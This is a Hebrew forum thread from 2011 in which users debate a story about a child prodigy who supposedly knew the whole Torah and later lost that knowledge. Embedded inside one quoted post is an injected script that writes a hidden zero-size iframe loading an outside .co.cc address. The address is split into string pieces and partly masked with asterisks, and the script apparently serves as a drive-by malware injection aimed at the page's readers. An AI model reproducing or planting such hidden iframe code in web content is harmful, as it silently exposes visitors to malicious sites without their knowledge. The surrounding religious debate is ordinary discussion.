|
|
| נשלח ב-7/8/2011 11:00 |
|
| |
יתכן מטרתי בפתיחת האשכול הייתה לבירור העובדות ואולי למציאת מקרים דומים במקרה שנחליט שזו "תאונה נוירולוגית". אם יש בעולם סוואנטים עם יכולות מוחיות על אנושיות, אני אוכל לחיות טוב גם עם ילד פלא מסוג אחר. בירור העובדות בעייתית וקשה כי אביו של הילד הוזהר על ידי האדמו"ר להסתירו מחשש עין הרע, ולפי דברי שותפיסוד הוא עד היום חושש מהצל של עצמו. אבל בשביל בירור העובדות אין אנו צריכים את דעתך המדעית בענין, אלא מציאת אנשים שראו ושמעו מכלי ראשון וציינתי שנים כאלה למעלה.
מה אכפת לך אם היית טורח באמת לקרוא מה שנכתב באשכול זה, היית רואה שאני פתחתי את האשכול בעקבות הסבת תשומת לבו של חברי לערך בויקי, ערך שכנראה הוא בעצמו פתח, וממש לא ניסיתי להציג את הויקי כאילן גבוה כי הוא בכלל לא כזה. מי שמכיר יודע כמה ערכי זבל יש שם. כך שהמופעים בהחלט לא מקריים.
קסת ממה שהבנתי עד כה לא נעשה כל פעולה להשכיח ממנו, אלא זה איכשהו נעלם לו עם השנים. יתכן גם שכל הסיפור לא נכון. אבל חלק זה של ההשכחה אין לו כל מקור.
|
|
|
|
| נשלח ב-7/8/2011 12:01 |
|
| |
תשרת כתב "וממש לא ניסיתי להציג את הויקי כאילן גבוה כי הוא בכלל לא כזה." אז האם העלאת הנושא בעקבות דווח "בכלי תקשורת מכובד" לא נחשב היתלות באילן גבוה?. "עקב זה שראיתי שהנושא דווח בכלי תקשורת מכובד, אני רוצה בכל זאת רציתי לנסות לתת מתווה לדיון בכמה אספטקים בנושא". בכל זאת הערך בויקפדיה נכתב רק עכשיו, והנה תוספת חדשה משם "הרב לייב באקשט, בחוברת תורנית שפורסמה לקראת פסח תשס"ד (כ-50 שנה לאחר התרחשות הסיפור), ציין ששלח מכתב אל הרב יחזקאל לוינשטיין, ובו כתב לו שקשה לו להאמין לסיפור ("וכי ייתכן ששכח המלאך לסטור ילד אחד מישראל?"). הוא הוסיף שאם הסיפור אמת, ראוי להציג את הילד לעין כל, משום ש"בזה יתברר אמיתת דתינו לכל העולם, כי הנה הוכחה ברורה היא שיש ילד קטן היודע את כל התורה כולה!"[2]. הרב לוינשטיין ענה: "העובדה אמת היא. בתי וחתני [הרב ראובן גינזבורג] גרים שתי דירות לאותה משפחה, ובתי ראתה את הדבר וסיפרה לי אודותיו... כי אף שהילד גר בבני ברק לא רחוק ממני, הרי שמעתי אודות הדבר מבתי ומאמין אני לה". ומוסיף: "כבר חשבתי לילך בעצמי לראות את הפלא, אמנם חזרתי בי, ומה שעלתה על לבי לראות בעצמי, עצת היצר הרע היא להרוס כל אמונתנו שנבנית על 'אבותינו סיפרו לנו', והיינו שדבר הנשמע לנו מאדם נאמן... די לנו בזה להאמין בו"[7]." אז הילד כבר עבר מירושלים לבני ברק, היה שכנו של ר' חצקל לוינשטיין. מה לעשות בגלגול נוסף הוא בכלל יעבור לבאר שבע לחצרו של ר' אלעזר. אין גבול לנוכלים הרמאים שמספרים סיפורי שקר
 |
|
|
|
|
|
| נשלח ב-7/8/2011 12:24 |
|
| |
אני לא מבין את הטיעון של הרב לוינשטיין, הלא לכו"ע ראיה עדיפה משמיעה.
|
|
|
|
| נשלח ב-7/8/2011 12:24 |
|
| |
מה אכפת אני חייב לומר לך שלא הבנתי כלל את תלונתך עלי. אמרתי ששני המופעים אינם מקריים כלל. ויקיפדיה אינו מקור לשום דבר. ועיתון מעריב מהתקופה ההיא הוא בהחלט יותר מסיפורי סבתא מבחינתי, אף שהוא גם לא מקור אמין לאמת את העובדה אלא מקור לכך שאנשים דיברו אודות המקרה עוד בשעת התרחשותו.
בקשר לדיקדוקי העניות שלך. אין לי מושג היכן גר הילד אז. אני כן יודע שכיום הוא גר ברחובות ואני גם יודע את שמו. נראה גם שמנהגך לקרוא ברפרוף ולהעלות טענות לא מבוססות. מקריאתי עתה את הערך נכתב שם שהוא היה שכנו של חתנו של הרב לוינשטיין. בשונה ממה שהעתקת כאן. שמועת כנף ישנה זו לא תכנן אותה אף נוכל או רמאי. ואין לאף אחד אינטרס לכפות עליך אמונה בכל סיפור סבתא.
|
|
|
|
| נשלח ב-7/8/2011 14:32 |
|
| |
אני בסה"כ עשיתי העתק הדבק מויקיפדיה. ואתה מאשים אותי בסילוף?
הרב לוינשטיין גר בבית אחד עם ביתו וחתנו בבני ברק ליד הישיבה.
לפי העדויות באשכול הילד למד וגר בירושליים. ולא בבני ברק.
|
|
|
|
| נשלח ב-7/8/2011 17:12 |
|
| |
קבל התנצלותי. האשמתיך בחסרון שבי ולא הבחנתי שכתוב שם בהמשך שהילד גר בבני ברק. מתוך ויקיפדיה אי אפשר לדעת שהרב לוונשטיין גר בבית ביתו וחתנו.
עדיין אני חושב שאתה מתעסק בדיקדוקי עניות כי מדובר באדם מוכר והפרטים של מקום מגוריו המדויק בזמנו אינם קשורים כלל לעצם העובדות. אם תרצה אוכל להתאמץ ולברר אצל מכריו היכן הוא היה גר בילדותו. וזה לא באמת משנה.
|
|
|
|
| נשלח ב-7/8/2011 18:11 |
|
| |
תשרת, אין לי שום דעה "מדעית" בעניין. כדבריך, צריך למצוא אנשים שראו ובדוחק, כאלו ששמעו, מכלי ראשון. "שנים ממשמשיו של האדמו"ר מבעלזא סיפרו לכותב הערך בויקיפדיה", אינה עדות מכלי ראשון.
|
|
|
|
| נשלח ב-7/8/2011 18:17 |
|
| |
| ייתכן כתב: |  | | תשרת, אין לי שום דעה "מדעית" בעניין. כדבריך, צריך למצוא אנשים שראו ובדוחק, כאלו ששמעו, מכלי ראשון. "שנים ממשמשיו של האדמו"ר מבעלזא סיפרו לכותב הערך בויקיפדיה", אינה עדות מכלי ראשון. |
|
ייתכן,
תפסיק לרעוד.
מציעים לך להיפגש עם האדם עצמו, מה אתה צריך יותר מזה.
אני כשהייתי במצבך לא הססתי לרגע לבדוק כל דבר.
קדימה, קדימה.
|
|
|
|
| נשלח ב-7/8/2011 18:21 |
|
| |
אני מוכן להיפגש אתו בכל רגע. לא רק מוכן, אלא מאד רוצה. סקרנות.
הפגישה הזאת תספק את יצר הרכילות אך לא תתרום מאומה. אין משמעות למעיד בגדלותו על מה שראה בקטנותו בגיל כה רך.
בלי קשר אשמח מאד לפגוש אותו.
תוקן על ידי ייתכן ב- 07/08/2011 18:12:13
|
|
|
|
| נשלח ב-7/8/2011 18:22 |
|
| |
| מיימוני כתב: |  |
ייתכן
איך החי מכחיש את החי, ובמיוחד בלי שבדק עם הטוענים? האם על סמך הנחתנו המדעית שאין כאלו דברים אנו רשאים לשלול עדויות? אילו לא היו עדים לפנינו, הייתי מצטרף אליך וכותב שאין צורך להאמין במה שהמדע שולל, אם כי הייתי כותב זאת מתודולוגית ולא כראיה גמורה. אבל עכשו שיש לנו עדות חלקית, גם של חברי פורום, מדוע אתה שולל עקרונית בלי לתת הזדמנות של בדיקה? אתמהה.
******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");> |
|
מיימוני,
עזוב את ייתכן והתחמקויותיו.
מה קורה איתך ?
בוא אתה ותיפגש עם היהודי ותהיה בודק נאמן עבור כל הפורום.
מה הפחד, לחזור בתשובה ?
אגב, לכל הפונים אלי באישי.
היות ואני רוצה לבלבל ליהודי את הראש כמה שפחות, אקח איתי לפגישה איתו (אם וכאשר יסתדר בס"ד) רק המתנגדים הגדולים ביותר, כי אחרת הם שוב ישארו בהתפתלויותיהם.
מה לעשות, הנה יוצא חוטא נשכר...
|
|
|
|
| נשלח ב-7/8/2011 18:23 |
|
| |
אוקיי, ייתכן. שלח לי טלפון באישי.
|
|
|
|
| נשלח ב-8/8/2011 08:20 |
|
| |
שותף
כידוע (אני משער) איני יכול להרשות לעצמי שום חשיפה ולו הקלה ביותר.
אך אם מתארגנת פגישה, אשמח מאד לשלוח שאלות. אולי אפשר לרכז כאן בהמשך שאלות להפנות לאיש שפעם היה ילד הפלא.
|
|
|
| נשלח ב-8/8/2011 09:44 |
|
| |
| מיימוני כתב: |  |
שותף
כידוע (אני משער) איני יכול להרשות לעצמי שום חשיפה ולו הקלה ביותר.
אך אם מתארגנת פגישה, אשמח מאד לשלוח שאלות. אולי אפשר לרכז כאן בהמשך שאלות להפנות לאיש שפעם היה ילד הפלא. |
|
אתה חייב להיות שם ולהתרשם בעצמך, כי רק בשבילך אני מוכן לעשות את כל המאמץ הזה.
תבוא בתחפושת, תשנה את זהותך, תחשוב על כל דרך יצירתית שתרצה (אולי למישהו יש רעיון ?!).
היות ואתה מנהיג המרד אתה חייב להיות בראש בכל מצב, ומי יודע אם לעת כזאת הגעת למלכות.....
|
|
|
|
| נשלח ב-8/8/2011 14:42 |
|
| |
שותף סוד
רק תבהיר עם מי אתה הולך להפגיש את נכבדי הפורום.
עם הילד הירושלמי שהאדמור מבעלזא השכיח ממנו את הידע.
או עם הילד הבני ברקי שהבבא סאלי היכה על פיו.
או עם הילד הנתניתי שידע בע"פ את הבן איש חי, והאדמור מקלויזנבורג היכה על פיו?
|
|
|
|
| נשלח ב-8/8/2011 14:54 |
|
| |
שותפי אני לא מבין, למעלה באשכול הזה טענת שאתה לא היית בונה שום דבר על הסיפור הזה, מגם בהנחה שזה קרה. מה השתנתה?
וחוץ מזה, לכאורה יש צדק בטענת יתכן שעדות האיש בעצמו על מה שקרה לו בהיותו בן ד' או ה' אינו בכלל אלו שנאמנין להעיד בגדלם על מה שראו בקטנותם. אם היית מעלה את המכתב שדברת עליו זה היה ראיה יותר טובה.
|
|
|
|
|